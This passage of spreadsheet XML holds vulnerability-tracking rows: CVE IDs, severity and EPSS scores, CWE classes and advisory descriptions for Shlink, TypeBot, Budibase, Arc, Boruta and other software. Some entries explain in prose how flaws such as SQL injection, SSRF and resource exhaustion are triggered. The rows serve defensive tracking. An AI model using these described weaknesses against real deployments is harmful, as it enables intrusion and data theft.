      <c r="B3096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18737</t>
        </is>
      </c>
      <c r="C3096" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3096" s="5" t="inlineStr"/>
      <c r="F3096" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3096" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H3096" s="5" t="inlineStr"/>
      <c r="I3096" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3096" s="5" t="inlineStr"/>
      <c r="K3096" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3096" s="5" t="inlineStr">
        <is>
          <t>Shlink contains a blind SQL injection vulnerability that allows any authenticated API key holder to inject arbitrary SQL fragments by supplying an unvalidated direction value in the orderBy query parameter of the tag statistics endpoint. Attackers can craft a malicious direction string containing SQL subqueries that flows unsanitized into a Doctrine QueryBuilder ORDER BY clause, enabling time-based, boolean-oracle, and error-based extraction of sensitive data including long URLs, visitor records, IP addresses, geolocation data, user agents, and hashed API key secrets from any tenant.</t>
        </is>
      </c>
      <c r="M3096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18737</t>
        </is>
      </c>
    </row>
    <row r="3097">
      <c r="A3097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19051</t>
        </is>
      </c>
      <c r="C3097" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3097" s="5" t="inlineStr"/>
      <c r="F3097" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3097" s="5" t="inlineStr"/>
      <c r="H3097" s="5" t="inlineStr"/>
      <c r="I3097" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3097" s="5" t="inlineStr"/>
      <c r="K3097" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="L3097" s="5" t="inlineStr">
        <is>
          <t>Plaintext storage of a password vulnerability in Menulux Software Inc. Menulux Portal allows Retrieve Embedded Sensitive Data.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="M3097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19051</t>
        </is>
      </c>
    </row>
    <row r="3098">
      <c r="A3098" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19671</t>
        </is>
      </c>
      <c r="C3098" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3098" s="5" t="inlineStr"/>
      <c r="F3098" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3098" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3098" s="5" t="inlineStr"/>
      <c r="I3098" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3098" s="5" t="inlineStr"/>
      <c r="K3098" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L3098" s="5" t="inlineStr">
        <is>
          <t>Malcolm's upload-processing pipeline (scripts/safe-extract.py) enforces entry-count, nesting-depth, and total-uncompressed-byte limits when extracting container archives (zip/tar/rar/7z via libarchive), but those limits are not applied when the uploaded file is a single-stream compressed format (.gz, .bz2, .xz, .lzma, .lz) that isn't a .tar.*-style archive. Any authenticated user permitted to upload PCAP/log files can upload a small, highly compressible file (e.g. a gzip bomb) that decompresses to an effectively unbounded size on disk, exhausting the shared Docker volume used by OpenSearch, Logstash, Arkime, and Zeek, and disrupting the platform for all users.</t>
        </is>
      </c>
      <c r="M3098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19671</t>
        </is>
      </c>
    </row>
    <row r="3099">
      <c r="A3099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="C3099" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3099" s="5" t="inlineStr"/>
      <c r="F3099" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3099" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="H3099" s="5" t="inlineStr"/>
      <c r="I3099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3099" s="5" t="inlineStr"/>
      <c r="K3099" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="L3099" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M3099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="3100">
      <c r="A3100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21104</t>
        </is>
      </c>
      <c r="C3100" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3100" s="5" t="inlineStr"/>
      <c r="F3100" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3100" s="5" t="inlineStr"/>
      <c r="H3100" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I3100" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3100" s="5" t="inlineStr"/>
      <c r="K3100" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3100" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in KnoxVault trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M3100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21104</t>
        </is>
      </c>
    </row>
    <row r="3101">
      <c r="A3101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23940</t>
        </is>
      </c>
      <c r="C3101" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3101" s="5" t="inlineStr"/>
      <c r="F3101" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3101" s="5" t="inlineStr"/>
      <c r="H3101" s="5" t="inlineStr">
        <is>
          <t>hex:hexpm</t>
        </is>
      </c>
      <c r="I3101" s="5" t="inlineStr">
        <is>
          <t>2026-03-13</t>
        </is>
      </c>
      <c r="J3101" s="5" t="inlineStr"/>
      <c r="K3101" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3101" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled Resource Consumption vulnerability in hexpm hexpm/hexpm allows Excessive Allocation.
Publishing an oversized package can cause Hex.pm to run out of memory while extracting the uploaded package tarball. This can terminate the affected application instance and result in a denial of service for package publishing and potentially other package-processing functionality.
This issue affects hex.pm: before 2026-03-10.</t>
        </is>
      </c>
      <c r="M3101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23940</t>
        </is>
      </c>
    </row>
    <row r="3102">
      <c r="A3102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30865</t>
        </is>
      </c>
      <c r="C3102" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3102" s="5" t="inlineStr"/>
      <c r="F3102" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3102" s="5" t="inlineStr"/>
      <c r="H3102" s="5" t="inlineStr"/>
      <c r="I3102" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3102" s="5" t="inlineStr"/>
      <c r="K3102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3102" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the dashboard save functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M3102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30865</t>
        </is>
      </c>
    </row>
    <row r="3103">
      <c r="A3103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35219</t>
        </is>
      </c>
      <c r="C3103" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3103" s="5" t="inlineStr"/>
      <c r="F3103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3103" s="5" t="inlineStr"/>
      <c r="H3103" s="5" t="inlineStr"/>
      <c r="I3103" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3103" s="5" t="inlineStr"/>
      <c r="K3103" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3103" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.41.3, automation steps in packages/server/src/automations/steps/outgoingWebhook.ts, packages/server/src/automations/steps/zapier.ts, packages/server/src/automations/steps/n8n.ts, packages/server/src/automations/steps/slack.ts, and packages/server/src/automations/steps/discord.ts use node-fetch on user-provided URLs without the BLACKLIST_IPS enforcement used by the REST integration, allowing an authenticated user to make server-side requests to cloud metadata and internal services. This issue is fixed in version 3.41.3.</t>
        </is>
      </c>
      <c r="M3103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35219</t>
        </is>
      </c>
    </row>
    <row r="3104">
      <c r="A3104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35445</t>
        </is>
      </c>
      <c r="C3104" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3104" s="5" t="inlineStr"/>
      <c r="F3104" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3104" s="5" t="inlineStr"/>
      <c r="H3104" s="5" t="inlineStr"/>
      <c r="I3104" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3104" s="5" t="inlineStr"/>
      <c r="K3104" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L3104" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions prior to 1.2.13, the backend did not validate the handler name submitted through the form postback _handler POST field, allowing an authenticated backend user to invoke arbitrary controller methods, including protected, private, and action-prefixed ones. While AJAX requests validate that handler names match the on[A-Z][\w+]* pattern, the postback path passed the submitted _handler value straight to the handler dispatcher with no such check, so any controller that exposes a public action or conditionally relaxes its $requiredPermissions check could be reached, bypassing the roles and permissions system. The built-in Users controller was affected because it set $requiredPermissions to null for the myaccount action, letting any authenticated backend user invoke user-management methods such as update_onDelete and update_onManualPasswordReset without holding the backend.manage_users permission. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M3104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35445</t>
        </is>
      </c>
    </row>
    <row r="3105">
      <c r="A3105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38821</t>
        </is>
      </c>
      <c r="C3105" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3105" s="5" t="inlineStr"/>
      <c r="F3105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3105" s="5" t="inlineStr"/>
      <c r="H3105" s="5" t="inlineStr"/>
      <c r="I3105" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3105" s="5" t="inlineStr"/>
      <c r="K3105" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3105" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability exists in openNDS before 11.0.0 that allows an unauthenticated attacker on the captive portal network to crash the openNDS daemon (denial of service) and potentially achieve remote code execution. This is in http_microhttpd.c.</t>
        </is>
      </c>
      <c r="M3105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38821</t>
        </is>
      </c>
    </row>
    <row r="3106">
      <c r="A3106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42142</t>
        </is>
      </c>
      <c r="C3106" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3106" s="5" t="inlineStr"/>
      <c r="F3106" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3106" s="5" t="inlineStr"/>
      <c r="H3106" s="5" t="inlineStr"/>
      <c r="I3106" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3106" s="5" t="inlineStr"/>
      <c r="K3106" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3106" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, the `handleGetSheets` API handler (`POST /api/sheets/getSheets`) does not validate workspace membership, allowing any authenticated user to access and decrypt another workspace's Google Sheets OAuth credentials and retrieve spreadsheet data (sheet names, IDs, column headers). Version 3.17.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M3106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42142</t>
        </is>
      </c>
    </row>
    <row r="3107">
      <c r="A3107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45808</t>
        </is>
      </c>
      <c r="C3107" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3107" s="5" t="inlineStr"/>
      <c r="F3107" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3107" s="5" t="inlineStr"/>
      <c r="H3107" s="5" t="inlineStr"/>
      <c r="I3107" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3107" s="5" t="inlineStr"/>
      <c r="K3107" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3107" s="5" t="inlineStr">
        <is>
          <t>OpenBao is an open source identity-based secrets management system. Prior to version 2.5.4, OpenBao's namespaces provide multi-tenant separation. A tenant who intentionally leaks lease identifiers can have their lease and underlying credential revoked or renewed by a user in another tenant via the legacy, undocumented `sys/revoke` and `sys/renew` endpoints. This is fixed in OpenBao v2.5.4.</t>
        </is>
      </c>
      <c r="M3107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45808</t>
        </is>
      </c>
    </row>
    <row r="3108">
      <c r="A3108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47682</t>
        </is>
      </c>
      <c r="C3108" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3108" s="5" t="inlineStr"/>
      <c r="F3108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3108" s="5" t="inlineStr"/>
      <c r="H3108" s="5" t="inlineStr"/>
      <c r="I3108" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3108" s="5" t="inlineStr"/>
      <c r="K3108" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3108" s="5" t="inlineStr">
        <is>
          <t>CVAT is an open source interactive video and image annotation tool for computer vision. In versions 1.6.0 through 2.64.0, an attacker with write access to a cloud storage that's been added to a CVAT instance, or ability to add new cloud storages, is able to overwrite arbitrary files on the server's filesystem. This issue has been fixed in version 2.65.0.</t>
        </is>
      </c>
      <c r="M3108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47682</t>
        </is>
      </c>
    </row>
    <row r="3109">
      <c r="A3109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47704</t>
        </is>
      </c>
      <c r="C3109" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3109" s="5" t="inlineStr"/>
      <c r="F3109" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3109" s="5" t="inlineStr"/>
      <c r="H3109" s="5" t="inlineStr"/>
      <c r="I3109" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3109" s="5" t="inlineStr"/>
      <c r="K3109" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3109" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, an authenticated user who has read access to any typebot can resume a waiting webhook session that belongs to a different typebot by mixing an authorized `typebotId` and `blockId` and a foreign live `resultId`. The webhook resume handler authorizes the parent typebot first, but then resolves the descendant `result` only by `resultId`. As a result, an attacker can inject arbitrary webhook JSON into another typebot's suspended session and advance its execution without any access to the victim typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M3109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47704</t>
        </is>
      </c>
    </row>
    <row r="3110">
      <c r="A3110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47735</t>
        </is>
      </c>
      <c r="C3110" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3110" s="5" t="inlineStr"/>
      <c r="F3110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3110" s="5" t="inlineStr"/>
      <c r="H3110" s="5" t="inlineStr"/>
      <c r="I3110" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3110" s="5" t="inlineStr"/>
      <c r="K3110" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-918</t>
        </is>
      </c>
      <c r="L3110" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc's user-SQL validator (`internal/api/query.go:ValidateSQLRequest`) blocked only `read_parquet(` and `arc_partition_agg(` via regex denylist. The broader DuckDB I/O function family — `read_csv_auto`, `read_csv`, `read_json`, `read_json_auto`, `read_text`, `read_blob`, `glob`, `parquet_metadata`, `parquet_schema`, `read_xlsx`, etc. — was not blocked. RBAC table-reference extraction inspected only `FROM`/`JOIN` clauses, so scalar table functions in the `SELECT` list slipped past both layers. This is fixed in 2026.06.1 via a structural sandbox at the DuckDB layer. After lockdown, DuckDB refuses to open any file outside the allowlist and refuses further `INSTALL`/`LOAD`. Already-loaded extensions remain callable. Some workarounds are available. Restrict API access to known-trusted networks via firewall rules or, as a temporary mitigation, add `read_csv*`/`read_json*`/`glob` etc. to `dangerousSQLPattern` in `internal/api/query.go`.</t>
        </is>
      </c>
      <c r="M3110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47735</t>
        </is>
      </c>
    </row>
    <row r="3111">
      <c r="A3111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47765</t>
        </is>
      </c>
      <c r="C3111" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3111" s="5" t="inlineStr"/>
      <c r="F3111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3111" s="5" t="inlineStr"/>
      <c r="H3111" s="5" t="inlineStr"/>
      <c r="I3111" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3111" s="5" t="inlineStr"/>
      <c r="K3111" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3111" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 15.110.0 and 16.20.0, the restore and bulk_restore endpoints do not apply the appropriate document permission checks, allowing an authenticated user to restore deleted documents without the required authorization. This issue is fixed in versions 15.110.0 and 16.20.0.</t>
        </is>
      </c>
      <c r="M3111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47765</t>
        </is>
      </c>
    </row>
    <row r="3112">
      <c r="A3112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48099</t>
        </is>
      </c>
      <c r="C3112" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3112" s="5" t="inlineStr"/>
      <c r="F3112" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3112" s="5" t="inlineStr"/>
      <c r="H3112" s="5" t="inlineStr"/>
      <c r="I3112" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3112" s="5" t="inlineStr"/>
      <c r="K3112" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3112" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. WsgiDAV 4.3.3 and prior can allow a WebDAV request path containing an encoded parent-directory segment to escape the configured filesystem share root in a specific path layout. The issue is fixed with version 4.3.4.</t>
        </is>
      </c>
      <c r="M3112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48099</t>
        </is>
      </c>
    </row>
    <row r="3113">
      <c r="A3113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48494</t>
        </is>
      </c>
      <c r="C3113" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3113" s="5" t="inlineStr"/>
      <c r="F3113" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3113" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H3113" s="5" t="inlineStr"/>
      <c r="I3113" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3113" s="5" t="inlineStr"/>
      <c r="K3113" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3113" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. In version 3.16.1, an authenticated user who has read access to any typebot can resume a WhatsApp preview webhook session that belongs to a different typebot by mixing an authorized `typebotId` and `blockId` and a foreign preview phone number tied to another preview session. The WhatsApp test-webhook handler authorizes the parent typebot first, but then resolves the preview chat session only by `wa-preview-{phone}`. As a result, an attacker can inject arbitrary webhook JSON into another workspace's WhatsApp preview session and advance its draft/unpublished flow without any access to the victim typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M3113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48494</t>
        </is>
      </c>
    </row>
    <row r="3114">
      <c r="A3114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48495</t>
        </is>
      </c>
      <c r="C3114" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3114" s="5" t="inlineStr"/>
      <c r="F3114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3114" s="5" t="inlineStr"/>
      <c r="H3114" s="5" t="inlineStr"/>
      <c r="I3114" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3114" s="5" t="inlineStr"/>
      <c r="K3114" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3114" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, the Google Sheets OAuth callback decodes a base64-encoded JSON `state` parameter and trusts the embedded `workspaceId`, `typebotId`, `blockId`, and `redirectUrl` without cryptographic integrity protection or authorization checks. The callback route is authenticated, but it does not verify that the authenticated user has write access to the target workspace or Typebot before creating credentials in the workspace or updating Typebot groups. An authenticated user who can obtain a valid Google OAuth `code` can alter the `state` value to create Google Sheets credentials in another workspace and, if target IDs are known, attach those credentials to a block in another Typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M3114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48495</t>
        </is>
      </c>
    </row>
    <row r="3115">
      <c r="A3115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49249</t>
        </is>
      </c>
      <c r="C3115" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3115" s="5" t="inlineStr"/>
      <c r="F3115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3115" s="5" t="inlineStr"/>
      <c r="H3115" s="5" t="inlineStr"/>
      <c r="I3115" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3115" s="5" t="inlineStr"/>
      <c r="K3115" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L3115" s="5" t="inlineStr">
        <is>
          <t>Boruta is a standalone authorization server that aims to implement OAuth 2.0 and Openid Connect up to decentralized identity specifications. Prior to version 0.10.0, BorutaIdentityWeb.UserSettingsController.update/2 atomizes every key of the user-supplied request body via String.to_atom/1 before any validation. Because String.to_atom interns atoms permanently in the BEAM atom table (default cap 1,048,576 atoms; ERL_MAX_ATOMS), any authenticated end user can send PUT /users/settings with a user[&lt;fresh-key&gt;]=... body containing fresh keys per request and exhaust the global VM atom table. Once the table is full, the BEAM aborts with no more index entries in atom_tab and the entire OIDC server (auth, admin, gateway apps in the umbrella) crashes. The route is protected only by require_authenticated_user and a per-IP rate limit of 10 requests/second; a logged-in end user can hit it. The keys are atomized unconditionally before the downstream Accounts.update_user/6 call, so even failing updates contribute to exhaustion. This issue has been patched in version 0.10.0.</t>
        </is>
      </c>
      <c r="M3115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49249</t>
        </is>
      </c>
    </row>
    <row r="3116">
      <c r="A3116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49253</t>
        </is>
      </c>
      <c r="C3116" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3116" s="5" t="inlineStr"/>
      <c r="F3116" s="5" t="n">
        <v>0.004</v>
      </c>
